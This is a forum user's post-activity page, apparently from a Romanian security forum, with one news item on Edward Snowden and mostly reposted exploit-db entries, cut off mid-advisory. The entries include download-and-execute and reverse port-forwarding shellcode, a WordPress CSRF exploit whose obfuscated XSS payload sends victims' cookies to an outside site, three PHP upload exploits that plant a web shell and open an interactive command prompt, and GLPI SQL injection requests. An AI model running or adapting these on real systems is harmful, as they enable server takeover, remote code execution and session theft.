Jump to content

Matt

Active Members
 View Profile  See their activity

  • Posts

    1773

  • Joined

  • Last visited

  • Days Won

    6

 Content Type 

Everything posted by Matt

  1. Matt
    Fostul consultant Edward Snowden, responsabil pentru scurgerile de informatii privind programele americane de supraveghere a Internetului si telecomunicatiilor, a fost inculpat pentru spionaj de catre justitia americana care a solicitat Hong Kong-ului sa il aresteze. Tanarul, refugiat de la 20 mai la Hong Kong, a mai fost inculpat si pentru furt si utilizarea ilegala a bunurilor guvernamentale, relateaza AFP. Acesta este vizat de un mandat de arestare provizorie, precizeaza Washington Post care citeaza responsabili americani aflati sub anonimat. Un tratat de extradare este in vigoare intre Hong Kong si Statele Unite, insa Beijing are dreptul de a se opune prin veto. Solicitat de AFP, departamentul de Justitie nu a raspuns vineri seara. "Guvernul american nu va putea inabusi (acest caz) arestandu-ma sau omorandu-ma", a declarat luni fostul consultant al Agentiei de securitate nationala americana (NSA) in cadrul unui schimb in direct cu utilizatorii siteului The Guardian. "Adevarul a fost dezvaluit si nu poate fi oprit", a adaugat acesta. Originar din Hawaii unde lucra pentru un subcontractant de informatii american, Snowden, care a implinit 30 de ani vineri, s-a refugiat la Hong Kong in baza traditiei de aparare a libertatilor acestui teritoriu. Un om de afaceri legat de site-ul de internet WikiLeaks a dezvaluit joi seara ca islandezii pregatesc un zbor catre tara lor pentru acesta. Intr-un interviu pentru The Guardian la 9 iunie, acesta a afirmat ca Islanda este tara cea mai apropiata de valorile sale privind un internet liber si independent de stat. Sursa Business24.Ro
  2. Matt

    Primi mei bani.

    Matt replied to 010's topic in Cosul de gunoi

    Violent Championship Wrestling.
  3. Matt
    Author : Hamza Megahed Source : Linux/x86 Remote Port Forwarding Shellcode 87 bytes Vulnerable App : N/A Code : ***************************************************** * Linux/x86 Remote Port forwarding 87 bytes * * ssh -R 9999:localhost:22 192.168.0.226 * ***************************************************** * Author: Hamza Megahed * ***************************************************** * Twitter: @Hamza_Mega * ***************************************************** * blog: hamza-mega[dot]blogspot[dot]com * ***************************************************** * E-mail: hamza[dot]megahed[at]gmail[dot]com * ***************************************************** xor %eax,%eax push %eax pushl $0x3632322e pushl $0x30302e38 pushl $0x36312e32 pushw $0x3931 movl %esp,%esi push %eax push $0x32323a74 push $0x736f686c push $0x61636f6c push $0x3a393939 pushw $0x3930 movl %esp,%ebp push %eax pushw $0x522d movl %esp,%edi push %eax push $0x6873732f push $0x6e69622f push $0x7273752f movl %esp,%ebx push %eax push %esi push %ebp push %edi push %ebx movl %esp,%ecx mov $0xb,%al int $0x80 ******************************** #include <stdio.h> #include <string.h> char *shellcode = "\x31\xc0\x50\x68\x2e\x32\x32\x36\x68\x38\x2e\x30\x30\x68\x32\x2e\x31\x36" "\x66\x68\x31\x39\x89\xe6\x50\x68\x74\x3a\x32\x32\x68\x6c\x68\x6f\x73\x68" "\x6c\x6f\x63\x61\x68\x39\x39\x39\x3a\x66\x68\x30\x39\x89\xe5\x50\x66\x68" "\x2d\x52\x89\xe7\x50\x68\x2f\x73\x73\x68\x68\x2f\x62\x69\x6e\x68\x2f\x75" "\x73\x72\x89\xe3\x50\x56\x55\x57\x53\x89\xe1\xb0\x0b\xcd\x80"; int main(void) { fprintf(stdout,"Length: %d\n",strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; }
  4. Matt
    Author : RubberDuck Source : Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode Vulnerable App : N/A Code : /* Title: Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode Date: 2013-22-01 Author: RubberDuck Web: http://bflow.security-portal.cz http://www.security-portal.cz Tested on: Win 2k, Win XP Home SP2/SP3 CZ (32), Win 7 (32/64) -- file is downloaded from URL http://bflow.security-portal.cz/down/xy.txt -- xy.txt - http://www.virustotal.com/file/7d0d68f8e378d5aa29620c749f797d1d5fa05356fbf6f9ca64ba00f00fe86182/analysis/1358866648/ -- xy.txt only shows MessageBox with text "Test application for Allwin URLDownloadToFile shellcode" and title ">> Author: RubberDuck - http://bflow.security-portal.cz <<" */ #include <windows.h> #include <stdio.h> int main(){ unsigned char shellcode[] = "\x33\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B" "\x70\x14\xAD\x96\xAD\x8B\x58\x10\x8B\x53" "\x3C\x03\xD3\x8B\x52\x78\x03\xD3\x8B\x72" "\x20\x03\xF3\x33\xC9\x41\xAD\x03\xC3\x81" "\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04" "\x72\x6F\x63\x41\x75\xEB\x81\x78\x08\x64" "\x64\x72\x65\x75\xE2\x8B\x72\x24\x03\xF3" "\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x03\xF3" "\x8B\x14\x8E\x03\xD3\x33\xC9\x51\x68\x2E" "\x65\x78\x65\x68\x64\x65\x61\x64\x53\x52" "\x51\x68\x61\x72\x79\x41\x68\x4C\x69\x62" "\x72\x68\x4C\x6F\x61\x64\x54\x53\xFF\xD2" "\x83\xC4\x0C\x59\x50\x51\x66\xB9\x6C\x6C" "\x51\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C" "\x6D\x54\xFF\xD0\x83\xC4\x10\x8B\x54\x24" "\x04\x33\xC9\x51\x66\xB9\x65\x41\x51\x33" "\xC9\x68\x6F\x46\x69\x6C\x68\x6F\x61\x64" "\x54\x68\x6F\x77\x6E\x6C\x68\x55\x52\x4C" "\x44\x54\x50\xFF\xD2\x33\xC9\x8D\x54\x24" "\x24\x51\x51\x52\xEB\x47\x51\xFF\xD0\x83" "\xC4\x1C\x33\xC9\x5A\x5B\x53\x52\x51\x68" "\x78\x65\x63\x61\x88\x4C\x24\x03\x68\x57" "\x69\x6E\x45\x54\x53\xFF\xD2\x6A\x05\x8D" "\x4C\x24\x18\x51\xFF\xD0\x83\xC4\x0C\x5A" "\x5B\x68\x65\x73\x73\x61\x83\x6C\x24\x03" "\x61\x68\x50\x72\x6F\x63\x68\x45\x78\x69" "\x74\x54\x53\xFF\xD2\xFF\xD0\xE8\xB4\xFF" "\xFF\xFF" // http://bflow.security-portal.cz/down/xy.txt "\x68\x74\x74\x70\x3A\x2F\x2F\x62" "\x66\x6C\x6F\x77\x2E\x73\x65\x63\x75\x72" "\x69\x74\x79\x2D\x70\x6F\x72\x74\x61\x6C" "\x2E\x63\x7A\x2F\x64\x6F\x77\x6E\x2F\x78" "\x79\x2E\x74\x78\x74\x00"; LPVOID lpAlloc = NULL; void (*pfunc)(); lpAlloc = VirtualAlloc(0, 4096, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if(lpAlloc == NULL){ printf("Memory isn't allocated!\n"); return 0; } memcpy(lpAlloc, shellcode, lstrlenA((LPCSTR)shellcode) + 1); pfunc = (void ())lpAlloc; pfunc(); return 0; }
  5. Matt
    Author : expl0i13r Source : http://www.exploit-db.com/exploits/26124/ Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/2f4ba0fd6af11f2638c95f1083f41993-wp-sendsms.1.0.zip Code : ==================================== __ __ _ ___ _ __ ____ \ \ / / | | / _ \ (_) /_ | |___ \ ___ \ V / _ __ | | | | | | _ | | __) | _ __ / _ \ > < | '_ \ | | | | | | | | | | |__ < | '__| | __/ / . \ | |_) | | | | |_| | | | | | ___) | | | \___| /_/ \_\ | .__/ |_| \___/ |_| |_| |____/ |_| | | |_| blackpentesters.blogspot.com ============================================================= ########################################################################################### # Exploit Title: [ Wordpress WP-SendSMS v1.0 Plugin CSRF and Stored XSS Vulnerabilities] # # Date: [2013-6-9] # # Exploit Author: [expl0i13r] # # Vendor Homepage: [http://wordpress.org/plugins/wp-sendsms/] # # Software Link: [http://downloads.wordpress.org/plugin/wp-sendsms.1.1.zip] # # Version: [1.0] # # Tested on: [Wordpress 3.5.1 (Windows)] # # Contact: expl0i13r@gmail.com # ########################################################################################### Summary: ======== 1. Plugin Description 2. CSRF to Trigger Stored XSS 3. Stored XSS Details 1. Plugin Description: ======================== WP-SendSMS is WordPress Plugin for allowing user to send SMS using SMS Gateway. This Plugin allows site owner to add SMS Gateway in Plugin Setting Page. 2. CSRF to Trigger Stored XSS : =============================== Vulnerability Description: --------------------------- This wordpress plugin "WP-SendSMS 1.0" suffers from CSRF vulnerability which can be successfully exploited to trigger Stored XSS vulnerability which in turn sends Wordpress logged in user's cookie to attacker's website. Attacker can also exploit this CSRF vulnerability to change SMS Settings. Affected URL: -------------- http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=sms eXpl0it code: -------------- <html> <head> <script type="text/javascript" language="javascript"> function submitform() { document.getElementById('myForm').submit(); } </script> </head> <body> <form name="myForm" action="http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=sms" method="post"> <textarea name="wpsms_api1" id="wpsms_api1" class="regular-text" cols="100" rows="5">http://blackpentesters.blogspot.com/smsapi.php?username=yourusername&password=yourpassword&mobile=[Mobile]&sms=[TextMessage]&senderid=[SenderID]</textarea> <input type="text" name="sender_id" id="sender_id" value="eXpl0i13r"> <input type="checkbox" name="remove_bad_words" id="remove_bad_words" checked="checked" value="1"> # Below Field Contains XSS Payload for sending Cookies to attacker website : # In my case this will redirect you to http://blackpentesters.blogspot.com+cookies <input type="text" name="maximum_characters" class="maximum_characters" id="maximum_characters" value=""><script>location=String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(97)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(112)+String.fromCharCode(101)+String.fromCharCode(110)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(115)+String.fromCharCode(46)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(111)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(112)+String.fromCharCode(111)+String.fromCharCode(116)+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(111)+String.fromCharCode(109)+String.fromCharCode(47)+String.fromCharCode(63)+document.cookie</script>"> <input type="checkbox" name="captcha" id="captcha" checked="checked" value="1"> <input type="text" name="captcha_width" class="captcha_option_input" value="" id="acpro_inp4"> <input type="text" name="captcha_height" class="captcha_option_input" value="" id="acpro_inp5"> <input type="text" name="captcha_characters" class="captcha_option_input" value="4" id="acpro_inp6"> <input type="checkbox" name="confirm_page" id="confirm_page" checked="checked" value="1"> <input type="checkbox" name="allow_without_login" id="allow_without_login" checked="checked" value="1"> <input type="checkbox" name="custom_response" id="custom_response" value="1"> <textarea name="custom_response_text" cols="100" rows="5"></textarea> <input type="hidden" name="settings_submit" value="true"> <input type="submit" value="Update Settings" class="button-primary"> </form> <script type="text/javascript" language="javascript"> document.myForm.submit() </script> </body> </html> Stored XSS Details : ===================== URL: ===== http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=sms Stored XSS Vulnerable Parameters: ================================== 1. sender_id 2. maximum_characters 3. captcha_width 4. captcha_height 4. captcha_characters HTML Code : ------------- <input type="text" name="sender_id" id="sender_id" value=""> <input type="text" name="maximum_characters" class="maximum_characters" id="maximum_characters" value=""> <input type="text" name="captcha_width" class="captcha_option_input" value="1" id="acpro_inp4"> <input type="text" name="captcha_height" class="captcha_option_input" value="1" id="acpro_inp5"> <input type="text" name="captcha_characters" class="captcha_option_input" value="" id="acpro_inp6"> XSS Payload Used: ------------------ "><script>location=String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(97)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(112)+String.fromCharCode(101)+String.fromCharCode(110)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(115)+String.fromCharCode(46)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(111)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(112)+String.fromCharCode(111)+String.fromCharCode(116)+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(111)+String.fromCharCode(109)+String.fromCharCode(47)+String.fromCharCode(63)+document.cookie</script> Each of above parameters can be exploited by attacker through CSRF vulnerability for stealing Cookies. ################################## # eXpl0i13r # # ------------------------------ # #|blackpentesters.blogspot.com |# #|infotech-knowledge.blogspot.in|# # ------------------------------ # ##################################
  6. Matt
    Author : CWH Underground Source : Havalite CMS 1.1.7 - Unrestricted File Upload Exploit Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/cbd391e913d04224225cf924a7fcb2b5-havalite_1.1.7.zip Code : <?php /* ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' Exploit Title : Havalite CMS Unrestricted File Upload Exploit Date : 16 June 2013 Exploit Author : CWH Underground Site : www.2600.in.th Vendor Homepage : http://havalite.com/ Software Link : http://jaist.dl.sourceforge.net/project/havalite/havalite_1.1.7.zip Version : 1.1.7 Tested on : Window and Linux ##################################################### VULNERABILITY: Unrestricted File Upload ##################################################### /havalite/upload.php ##################################################### DESCRIPTION ##################################################### Restricted access to this script isn't properly realized (Don't require authentication) , so an attacker might be able to upload arbitrary files containing malicious PHP code due to uploaded file extension isn't properly checked. ##################################################### EXPLOIT ##################################################### */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n"); fputs($sock, $packet); return stream_get_contents($sock); } print "\n+-----------------------------------------------+"; print "\n| Havalite CMS Unrestricted File Upload Exploit |"; print "\n+-----------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /havalite/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $payload = "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"files[]\"; filename=\"sh.php\"\r\n"; $payload .= "Content-Type: application/octet-stream\r\n\r\n"; $payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n"; $payload .= "--o0oOo0o--\r\n"; $packet = "POST {$path}havalite/upload.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Referee: {$host}{$path}havalite/hava_upload.php\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; http_send($host, $packet); $packet = "GET {$path}/havalite/tmp/files/sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\nHavalite-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } ?>
  7. Matt
    Author : CWH Underground Source : Fly-High CMS 2012-07-08 - Unrestricted File Upload Exploit Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/2247a46025f3b85ab7705b8c2d0f2215-2012-07-08_unstable.zip Code : <?php /* ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' Exploit Title : Fly-High CMS Unrestricted File Upload Exploit Date : 15 June 2013 Exploit Author : CWH Underground Site : www.2600.in.th Vendor Homepage : http://sourceforge.net/projects/flyhighcms/ Software Link : http://jaist.dl.sourceforge.net/project/flyhighcms/unstable/2012-07-08_unstable.zip Version : 2012-07-08 Tested on : Window and Linux ##################################################### VULNERABILITY: Unrestricted File Upload ##################################################### /resources/upload.php (LINE: 30, 60-61) ----------------------------------------------------------------------------- Line: 30 $targetDir = "../" . $_GET['pfad']; ----------------------------------------------------------------------------- ----------------------------------------------------------------------------- Line: 60-61 if (!file_exists($targetDir)) @mkdir($targetDir); ----------------------------------------------------------------------------- ----------------------------------------------------------------------------- Line: 55-57 $fileName = 'upload_' . $count . $fileName_b; $filePath = $targetDir . DIRECTORY_SEPARATOR . $fileName; ----------------------------------------------------------------------------- ##################################################### DESCRIPTION ##################################################### An attacker might write to arbitrary files or inject arbitrary code into a file with this vulnerability. User tainted data is used when creating the file name that will be opened or when creating the string that will be written to the file. An attacker can try to write arbitrary PHP code in a PHP file allowing to fully compromise the server. ##################################################### EXPLOIT ##################################################### */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n"); fputs($sock, $packet); return stream_get_contents($sock); } print "\n+----------------------------------------------+"; print "\n| Fly-High CMS Unrestricted File Upload Exploit |"; print "\n+----------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /flyhighCMS/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $payload = "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n"; $packet = "POST {$path}resources/upload.php?pfad=cwh&name=1.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; http_send($host, $packet); $packet1 = "GET {$path}cwh/upload_1.php HTTP/1.0\r\n"; $packet1 .= "Host: {$host}\r\n"; $packet1 .= "Cmd: %s\r\n"; $packet1 .= "Connection: close\r\n\r\n"; while(1) { print "\nFlyhigh-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet1, base64_encode($cmd))); preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } ?>
  8. Matt
    Author : CWH Underground Source : imacs CMS 0.3.0 - Unrestricted File Upload Exploit Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/80ed91cbab87f82f42b4a712d5fb2bd9-imacs_V0_3_0_608.cmp.zip Code : <?php /* ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' Exploit Title : imacs CMS Unrestricted File Upload Exploit Date : 18 June 2013 Exploit Author : CWH Underground Site : www.2600.in.th Vendor Homepage : http://jrcmsdev.sourceforge.net/ Software Link : http://jaist.dl.sourceforge.net/project/jrcmsdev/imacs_V0_3_0_608.cmp.zip Version : 0.3.0 Tested on : Window and Linux ##################################################### VULNERABILITY: Unrestricted File Upload ##################################################### /src/assets/mng/mng.php ##################################################### DESCRIPTION ##################################################### Restricted access to this script isn't properly realized (Don't require authentication) , so an attacker might be able to upload arbitrary files containing malicious PHP code due to uploaded file extension isn't properly checked. ##################################################### EXPLOIT ##################################################### */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n"); fputs($sock, $packet); return stream_get_contents($sock); } print "\n==============================================\n"; print " imacs CMS Unrestricted File Upload Exploit \n"; print " \n"; print " Discovered By CWH Underground \n"; print "==============================================\n\n"; print " ,--^----------,--------,-----,-------^--, \n"; print " | ||||||||| `--------' | O \n"; print " `+---------------------------^----------| \n"; print " `\_,-------, _________________________| \n"; print " / XXXXXX /`| / \n"; print " / XXXXXX / `\ / \n"; print " / XXXXXX /\______( \n"; print " / XXXXXX / \n"; print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; print " (________( \n"; print " `------' \n\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /imacs/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $payload = "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"upload\"; filename=\"sh.php\"\r\n"; $payload .= "Content-Type: application/octet-stream\r\n\r\n"; $payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n"; $payload .= "--o0oOo0o--\r\n"; $packet = "GET {$path} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; $response = http_send($host, $packet); if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n"); $packet = "POST {$path}src/assets/mng/mng.php?dir= HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: {$sid[1]}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; http_send($host, $packet); $packet = "GET {$path}content/uploads/sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\nimacs-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } ################################################################################################################ # Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 ################################################################################################################ ?>
  9. Matt
    Author : LiquidWorm Source : GLPI v0.83.8 - Multiple Vulnerabilities Code : GLPI v0.83.8 Multiple Error-based SQL Injection Vulnerabilities Vendor: INDEPNET Development Team Product web page: http://www.glpi-project.org Affected version: 0.83.7 and 0.83.8 Summary: GLPI, an initialism for Gestionnaire libre de parc informatique (Free Management of Computer Equipment), was designed by Indepnet Association (a non profit organisation) in 2003. GLPI is a free asset and IT management software package, it also offers functionalities like servicedesk ITIL or license tracking and software auditing. Desc: Input passed via the POST parameter 'users_id_assign' in '/ajax/ticketassigninformation.php' script, POST parameter 'filename' in '/front/document.form.php' script, and POST parameter 'table' in 'glpi/ajax/comments.php' script is not properly sanitised before being used in SQL queries. This can be exploited by a malicious attacker to manipulate SQL queries by injecting arbitrary SQL code in the affected application. ====================================================================== /inc/db.function.php: --------------------- 274: function countElementsInTable($table, $condition="") { 275: global $DB; 276: 277: if (is_array($table)) { 278: $table = implode('`,`',$table); 279: } 280: 281: $query = "SELECT COUNT(*) AS cpt 282: FROM `$table`"; 283: 284: if (!empty($condition)) { 285: $query .= " WHERE $condition "; 286: } 287: 288: $result =$DB->query($query); 289: $ligne = $DB->fetch_array($result); 290: return $ligne['cpt']; 291: } ---------------------------------------------------------------------- *** MySQL query error : *** SQL: SELECT COUNT(*) AS cpt FROM `glpi_tickets`,`glpi_tickets_users` WHERE `glpi_tickets_users`.`tickets_id` = `glpi_tickets`.`id` AND `glpi_tickets_users`.`users_id` = \'2\'\' AND `glpi_tickets_users`.`type` = \'2\' AND `glpi_tickets`.`is_deleted` = 0 AND `glpi_tickets`.`status` NOT IN (\'solved\', \'closed\') Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2' AND `glpi_tickets`.`is_deleted` = 0 ' at line 3 Backtrace : /var/www/html/glpi/inc/db.function.php :288 DBmysql->query() /var/www/html/glpi/inc/commonitilobject.class.php :362 countElementsInTable() /var/www/html/glpi/ajax/ticketassigninformation.php :66 CommonITILObject->countActiveObjectsForTech() /var/www/html/glpi/ajax/ticketassigninformation.php ====================================================================== /inc/document.class.php: ------------------------ 1221: static function isValidDoc($filename) { 1222: global $DB; 1223: 1224: $splitter = explode(".",$filename); 1225: $ext = end($splitter); 1226: 1227: $query="SELECT * 1228: FROM `glpi_documenttypes` 1229: WHERE `ext` LIKE '$ext' 1230: AND `is_uploadable`='1'"; 1231: 1232: if ($result = $DB->query($query)) { 1233: if ($DB->numrows($result)>0) { 1234: return Toolbox::strtoupper($ext); 1235: } 1236: } 1237: return ""; 1238: } ---------------------------------------------------------------------- *** MySQL query error : *** SQL: SELECT * FROM `glpi_documenttypes` WHERE `ext` LIKE \'1\'\' AND `is_uploadable`=\'1\' Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 3 Backtrace : /var/www/html/glpi/inc/document.class.php :1232 DBmysql->query() /var/www/html/glpi/inc/document.class.php :1088 Document::isValidDoc() /var/www/html/glpi/inc/document.class.php :275 Document::uploadDocument() /var/www/html/glpi/inc/commondbtm.class.php :878 Document->prepareInputForUpdate() /var/www/html/glpi/front/document.form.php :99 CommonDBTM->update() /var/www/html/glpi/front/document.form.php ====================================================================== /inc/dbmysql.class.php: ----------------------- 364: function list_tables($table="glpi_%") { 365: return $this->query("SHOW TABLES LIKE '".$table."'"); 366: } ---------------------------------------------------------------------- *** MySQL query error : *** SQL: SHOW TABLES LIKE \'%glpi_users\'%\' Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1 Backtrace : /var/www/html/glpi/glpi/inc\dbmysql.class.php :365 DBmysql->query() /var/www/html/glpi/inc/db.function.php :1182 DBmysql->list_tables() /var/www/html/glpi/ajax/comments.php :47 TableExists() /var/www/html/glpi/ajax/comments.php ====================================================================== Tested on: Microsoft Windows 7 Ultimate SP1 (EN) - Apache/2.4.3, PHP/5.4.7 Linux CentOS 6.0 (Final) - Apache/2.2.15, PHP/5.3.3 Vulnerabilities discovered by Humberto Cabrera @dniz0r Zero Science Lab - http://www.zeroscience.mk Advisory ID: ZSL-2013-5145 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5145.php 09.05.2013 ---------------- {1} POST /glpi/ajax/ticketassigninformation.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://localhost/glpi/front/ticket.form.php Content-Length: 17 Cookie: PHPSESSID=5ducm98racrn23u3bl0kq8ap02 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache users_id_assign=2{SQL_Injection} ---------------- {2} POST /glpi/front/document.form.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/glpi/front/document.form.php?id=4 Cookie: PHPSESSID=5ducm98racrn23u3bl0kq8ap02 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------19302542618340 Content-Length: 1699 -----------------------------19302542618340 Content-Disposition: form-data; name="entities_id" 0 -----------------------------19302542618340 Content-Disposition: form-data; name="is_recursive" 0 -----------------------------19302542618340 Content-Disposition: form-data; name="name" test -----------------------------19302542618340 Content-Disposition: form-data; name="comment" test -----------------------------19302542618340 Content-Disposition: form-data; name="current_filepath" -----------------------------19302542618340 Content-Disposition: form-data; name="current_filename" -----------------------------19302542618340 Content-Disposition: form-data; name="filename"; filename=1{SQL_Injection} Content-Type: application/octet-stream -----------------------------19302542618340 Content-Disposition: form-data; name="upload_file" -----------------------------19302542618340 Content-Disposition: form-data; name="link" test -----------------------------19302542618340 Content-Disposition: form-data; name="documentcategories_id" 0 -----------------------------19302542618340 Content-Disposition: form-data; name="mime" application/octet-stream -----------------------------19302542618340 Content-Disposition: form-data; name="update" Update -----------------------------19302542618340 Content-Disposition: form-data; name="_read_date_mod" 2013-06-14 20:27:56 -----------------------------19302542618340 Content-Disposition: form-data; name="id" 4 -----------------------------19302542618340 Content-Disposition: form-data; name="_glpi_csrf_token" f27853afa3e705b5042c0ae4d135679c -----------------------------19302542618340-- ---------------- {3} POST /glpi/ajax/comments.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive Content-Length: 59 Origin: http://localhost X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Referer: http://localhost/glpi/front/planning.php Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: PHPSESSID=frk5prfmarsc9ebo1u751skkb2 value=5&table=glpi_users{SQL Injection}&withlink=comment_link_uID302668907 ---------------- ################################################################################################################# ? GLPI v0.83.7 (itemtype) Parameter Traversal Arbitrary File Access Exploit Vendor: INDEPNET Development Team Product web page: http://www.glpi-project.org Affected version: 0.83.7 Summary: GLPI, an initialism for Gestionnaire libre de parc informatique (Free Management of Computer Equipment), was designed by Indepnet Association (a non profit organisation) in 2003. GLPI is a free asset and IT management software package, it also offers functionalities like servicedesk ITIL or 